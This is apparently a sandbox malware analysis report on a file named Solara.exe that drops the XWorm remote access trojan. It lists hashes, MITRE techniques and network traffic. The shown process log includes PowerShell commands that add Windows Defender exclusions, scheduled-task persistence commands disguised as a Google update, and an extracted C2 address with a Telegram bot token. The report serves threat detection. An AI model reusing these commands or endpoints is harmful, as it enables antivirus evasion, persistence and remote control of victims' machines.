Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

Solara.exe

windows7-x64

10

Solara.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    10/10/2024, 09:06 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Solara.exe

  • Size

    796KB

  • MD5

    e91f3ec430934cf29cda88d9b730d893

  • SHA1

    6453d1f200f568b7964861c683a4f519431a9468

  • SHA256

    4960838a390adf1ea412850ca14f15ce7c201fa967c0089df97742ee517ed0fe

  • SHA512

    cc6afc8a20943ef7d18aaddde9f9257dbd7d0913aeb5ef66734cd593e580ecddde7a0706e4415c202655536b0665ce81116fd5ed487d3311caa10b33fbb7406b

  • SSDEEP

    12288:wyveQB/fTHIGaPkKEYzURNAwbAg/KyEbx/j76eLaOfqPCm+3KP8ps1uZ:wuDXTIGaPhEYzUzA0kyE1jue+AvUG

Score
10/10
xwormdiscoveryevasionexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:1764

cash-hispanic.gl.at.ply.gg:1764
Attributes
  • Install_directory

    %AppData%

  • install_file

    explorer.exe

  • telegram

    https://api.telegram.org/bot8013268995:AAHt5-BJsAIEM9hnoTy17y1WYC4NnCMU398/sendMessage?chat_id=5405936031

Signatures

  • Detect Xworm Payload 3 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Windows security bypass 2 TTPs 2 IoCs
    evasiontrojan
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
    persistence
  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 7 IoCs
  • Windows security modification 2 TTPs 3 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Solara.exe
    "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Users\Admin\AppData\Local\Temp\BootstrapperV21.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperV21.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BootstrapperV21.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2888
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BootstrapperV21.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2936
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3004
      • C:\Users\Admin\AppData\Local\Temp\cxtczt.exe
        "C:\Users\Admin\AppData\Local\Temp\cxtczt.exe"
        3⤵
        • UAC bypass
        • Windows security bypass
        • Event Triggered Execution: Image File Execution Options Injection
        • Executes dropped EXE
        • Windows security modification
        • Adds Run key to start application
        • Checks whether UAC is enabled
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:576
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /tn "GoogleUpdateTaskMachineUK" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\cxtczt.exe" /rl HIGHEST /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2416
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "GoogleUpdateTaskMachineUK" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\cxtczt.exe" /rl HIGHEST /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1748
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cxtczt.exe'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2232
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "explorer"
        3⤵
          PID:1296
      • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2500
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2500 -s 1072
          3⤵
          • Loads dropped DLL
          PID:1936
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {095CC137-2BED-481F-B0C3-93229DF35FA0} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1756
      • C:\Users\Admin\AppData\Roaming\explorer.exe
        C:\Users\Admin\AppData\Roaming\explorer.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2088
      • C:\Users\Admin\AppData\Local\Temp\cxtczt.exe
        C:\Users\Admin\AppData\Local\Temp\cxtczt.exe
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2804
    • C:\Windows\explorer.exe
      explorer.exe
      1⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Suspicious use of AdjustPrivilegeToken
      PID:1868

    Network

    • flag-us
      DNS
      getsolara.dev
      Bootstrapper.exe
      Remote address:
      8.8.8.8:53
      Request
      getsolara.dev
      IN A
      Response
      getsolara.dev
      IN A
      104.21.93.27
      getsolara.dev
      IN A
      172.67.203.125
    • flag-us
      DNS
      api.telegram.org
      BootstrapperV21.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
      Response
      api.telegram.org
      IN A
      149.154.167.220
    • flag-us
      DNS
      api.telegram.org
      BootstrapperV21.exe
      Remote address:
      8.8.8.8:53
      Request
      api.telegram.org
      IN A
    • flag-us
      DNS
      cash-hispanic.gl.at.ply.gg
      BootstrapperV21.exe
      Remote address:
      8.8.8.8:53
      Request
      cash-hispanic.gl.at.ply.gg
      IN A
      Response
      cash-hispanic.gl.at.ply.gg
      IN A
      147.185.221.23
    • 104.21.93.27:443
      getsolara.dev
      tls
      Bootstrapper.exe
      399 B
       219 B
       6
      5
    • 149.154.167.220:443
      api.telegram.org
      tls
      BootstrapperV21.exe
      440 B
       219 B
       6
      5
    • 127.0.0.1:1764
      BootstrapperV21.exe
    • 127.0.0.1:1764
      BootstrapperV21.exe
    • 147.185.221.23:1764
      cash-hispanic.gl.at.ply.gg
      BootstrapperV21.exe
      13.9kB
       664.4kB
       283
      536
    • 147.185.221.23:1764
      cash-hispanic.gl.at.ply.gg
      BootstrapperV21.exe
      4.1MB
       66.3kB
       3303
      934
    • 8.8.8.8:53
      getsolara.dev
      dns
      Bootstrapper.exe
      59 B
       91 B
       1
      1

      DNS Request

      getsolara.dev

      DNS Response

      104.21.93.27
      172.67.203.125

    • 8.8.8.8:53
      api.telegram.org
      dns
      BootstrapperV21.exe
      124 B
       78 B
       2
      1

      DNS Request

      api.telegram.org

      DNS Request

      api.telegram.org

      DNS Response

      149.154.167.220

    • 8.8.8.8:53
      cash-hispanic.gl.at.ply.gg
      dns
      BootstrapperV21.exe
      72 B
       88 B
       1
      1

      DNS Request

      cash-hispanic.gl.at.ply.gg

      DNS Response

      147.185.221.23

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Active Setup

    1
    T1547.014

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Event Triggered Execution

    1
    T1546

    Image File Execution Options Injection

    1
    T1546.012

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    2
    T1547

    Active Setup

    1
    T1547.014

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Event Triggered Execution

    1
    T1546

    Image File Execution Options Injection

    1
    T1546.012

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    3
    T1562

    Disable or Modify Tools

    3
    T1562.001

    Modify Registry

    6
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
      Filesize

      796KB

      MD5

      4b94b989b0fe7bec6311153b309dfe81

      SHA1

      bb50a4bb8a66f0105c5b74f32cd114c672010b22

      SHA256

      7c4283f5e620b2506bcb273f947def4435d95e143ae3067a783fd3adc873a659

      SHA512

      fbbe60cf3e5d028d906e7d444b648f7dff8791c333834db8119e0a950532a75fda2e9bd5948f0b210904667923eb7b2c0176140babc497955d227e7d80fb109d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\BootstrapperV21.exe
      Filesize

      77KB

      MD5

      b3a1a7ef45c3a920f515adc541ee75f4

      SHA1

      fa69e1c57709dfa076e792509e6c77d297e47664

      SHA256

      5cb0406be361324ecaeaa54238d82b24dffdfff8ae35dd2a59301e83e71d9d79

      SHA512

      8628cbac85e04d9f0ada20e6f46c74d3e22edda7095043e1f61bcfd7836b54f29f4dde6de6c72309fd8f7cf66a2d69d1fe7288914a213c35b1d40f7d98e4271c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\cxtczt.exe
      Filesize

      542KB

      MD5

      404b26070f0fe4a1a06df0240dfb4147

      SHA1

      de1b64a42e5e99737bb479de0746acf0882699ef

      SHA256

      cd5c0002b2ffbca152a0b377b5cb4aaf8e0d904d15a72224ab55094cf729603d

      SHA512

      60cbd8763e4a3a169f25997b8c9baf3c6f25283a8b166851a7d3c75af791cf36776a79d53f96a7465bfcf762e09980ed12573c1b374c0ed4ab62851e6de7a4d7

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmp587C.tmp.bat
      Filesize

      167B

      MD5

      524eadd00c9a49e24f463cbb02e17af7

      SHA1

      602412c44803c175f0f7bea198e75c405483dbf0

      SHA256

      884ac5f002f572b7e4712db749dab636accf91a798642859e089f86a37a6f0d2

      SHA512

      153bee4cbff684d29f226e24ad719d376e5206e0be19c64b3fae4b665fab2e6fb8d13984ee7b90e0a3d102719015d2bde997725e715b4b4ebbba4e1ff4bec1b0

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M5SC1VTZT4RREYU7RVYL.temp
      Filesize

      7KB

      MD5

      e0fdaf1f278467b95803d8be6f0a8836

      SHA1

      5ed21e1ecf72957eafaab9f8c799805db1dea75e

      SHA256

      4d41abc5da8170596702ad5c9657d9eb3e851851ab2fb13817298f8d9088b095

      SHA512

      b82c39ee1056da8f6189917d8b2fe9dd60d1fd4d430e69bdd11328ab4d39a0651dee65cec20604e45b73370218793661b237b470835fbafde3cd30f29e6740c9

      Download Submit

    • memory/576-135-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/576-156-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/576-98-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/576-99-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/576-175-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/576-71-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/576-196-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/780-59-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/780-23-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/780-65-0x0000000001F50000-0x0000000001F5C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/780-22-0x0000000000910000-0x000000000092A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2088-63-0x00000000001C0000-0x00000000001DA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2232-78-0x000000001B670000-0x000000001B952000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2232-79-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2500-20-0x000007FEF57C3000-0x000007FEF57C4000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2500-58-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2500-21-0x0000000000940000-0x0000000000A0E000-memory.dmp

      Filesize

      824KB

      Download

    • memory/2500-24-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2720-36-0x000000001B660000-0x000000001B942000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2720-37-0x0000000002350000-0x0000000002358000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2804-118-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/2804-117-0x0000000000400000-0x00000000005C9000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/2888-30-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2888-29-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

      Filesize

      2.9MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.